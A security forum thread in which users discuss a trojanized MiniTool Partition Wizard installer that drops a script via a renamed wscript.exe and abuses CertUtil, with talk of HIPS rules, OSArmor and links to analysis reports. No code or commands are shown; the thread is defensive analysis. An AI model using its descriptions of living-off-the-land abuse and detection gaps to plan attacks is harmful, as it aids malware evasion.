Tzatz 0 Posted November 10, 2021 Posted November 10, 2021 (edited) Eset never detected this virus embedded in Minitool... a malicious script is dropped by a compromised Minitool Partition Wizard. Files attached. I created a custom hips to detect files dropped into the \roamiming\ws folder, hoping one day I would find the culprit, it payed off: Continued: from: MiniTool Partition Wizard 12.zip Edited November 10, 2021 by Tzatz
itman 1,801 Posted November 10, 2021 Posted November 10, 2021 (edited) Yes, a bit of disappointment since there was a lengthily posting back in July in the forum on this Win "living off the land" binary abuse. Since you didn't post all Hybrid-Analysis details on this specific attack, here they are: https://www.hybrid-analysis.com/sample/e0f8a75737f932454aa9a325d35a7abc837fd05c23b5a5d1360d6ba1a6fb6479/60fbc6767746783ee4496bf6 BTW - OSArmor will protect against this specific Win LOL binary abuse since it specifically monitors for CertUtil execution with a command string attached. Ditto for all other known Win LOL binary abuse attack methods. Edited November 10, 2021 by itman
itman 1,801 Posted November 10, 2021 Posted November 10, 2021 (edited) Another clever element of this attack is the malware is bundled the Minitool Partition Wizard .exe installer. It is not unusual for installers to create files in the %Temp% and/or %AppData% directories and execute them. As such if one was monitoring these directories for process startup activities via Eset HIPS rules, it could be assumed any such created processes would be allowed to run. Also, Eset HIPS recommended anti-ransomware rules would have not prevented the renamed wscript.exe; i.e. ws.exe, from running from the %Temp% directory. This again highlights that the Eset HIPS should be monitoring .exe PE header name and provide global wildcard capability; e.g. *\wscript.exe, to block startup from any directory location. Edited November 10, 2021 by itman
itman 1,801 Posted November 10, 2021 Posted November 10, 2021 (edited) A few more comments. I went to the MiniTool Partition Wizard vendor's web site and downloaded the free version. The download was named pw1205-demo.exe. Next, the download was signed with a Sertigo code signed certificate. However, the file listed on VirusTotal is named, PartitionWizard.exe, and it is unsigned. Obviously, the malicious version of this software is not a legit version of MiniTool Partition Wizard. Edited November 11, 2021 by itman
Most Valued Members Nightowl 206 Posted November 14, 2021 Most Valued Members Posted November 14, 2021 On 11/10/2021 at 6:23 PM, itman said: BTW - OSArmor will protect against this specific Win LOL binary abuse since it specifically monitors for CertUtil execution with a command string attached. Ditto for all other known Win LOL binary abuse attack methods. Does that work like AppArmor in Linux? And have you tested it with ESET?
itman 1,801 Posted November 14, 2021 Posted November 14, 2021 2 hours ago, Nightowl said: Does that work like AppArmor in Linux? And have you tested it with ESET? Refer to this for what the software does: https://www.osarmor.com/ . Also, there are threads for software use and support on both wilderssecurity.com and malwaretips.com where it is quite popular. And yes, I run OSArmor concurrently with EIS with no conflicts. I do exclude Eset files and processes from OSArmor. But no exclusions for it in Eset.
ESET Insiders NewbyUser 74 Posted November 15, 2021 ESET Insiders Posted November 15, 2021 On 11/10/2021 at 10:23 AM, itman said: Yes, a bit of disappointment since there was a lengthily posting back in July in the forum on this Win "living off the land" binary abuse. Since you didn't post all Hybrid-Analysis details on this specific attack, here they are: https://www.hybrid-analysis.com/sample/e0f8a75737f932454aa9a325d35a7abc837fd05c23b5a5d1360d6ba1a6fb6479/60fbc6767746783ee4496bf6 BTW - OSArmor will protect against this specific Win LOL binary abuse since it specifically monitors for CertUtil execution with a command string attached. Ditto for all other known Win LOL binary abuse attack methods. Interesting article on the issue of LOLs. https://www.darkreading.com/threat-intelligence/open-source-project-aims-to-detect-living-off-the-land-attacks
itman 1,801 Posted November 15, 2021 Posted November 15, 2021 (edited) 11 hours ago, NewbyUser said: Interesting article on the issue of LOLs. https://www.darkreading.com/threat-intelligence/open-source-project-aims-to-detect-living-off-the-land-attacks Appears this tool is designed to be used in final verdict rendering by a human after a suspicious detection has been received from the AV solution: Quote Adobe's tool is best-suited for working with security log data, but it can work on any source of flat log data that follow the same patterns, such as authentication logs, Web server logs, and access logs, Adobe stated. https://www.darkreading.com/threat-intelligence/adobe-open-sources-tool-for-anomaly-research This is applicable to EDTD where suspicious verdicts are returned to the originating source. Such is not the case for LiveGuard. BTW - Microsoft is also starting to use like ML analysis: https://www.darkreading.com/analytics/microsoft-uses-machine-learning-to-predict-attackers-next-steps/d/d-id/1340642 . Again, this appears to be to inform an installation that they are being attacked so they can implement defensive measures against it. Edited November 15, 2021 by itman
itman 1,801 Posted November 15, 2021 Posted November 15, 2021 BTW - since we have mentioned Windows "living off the land" binaries that can be abused, here's a list of them along with associated MITRE ATT&CK® techniques: https://lolbas-project.github.io/#
Recommended Posts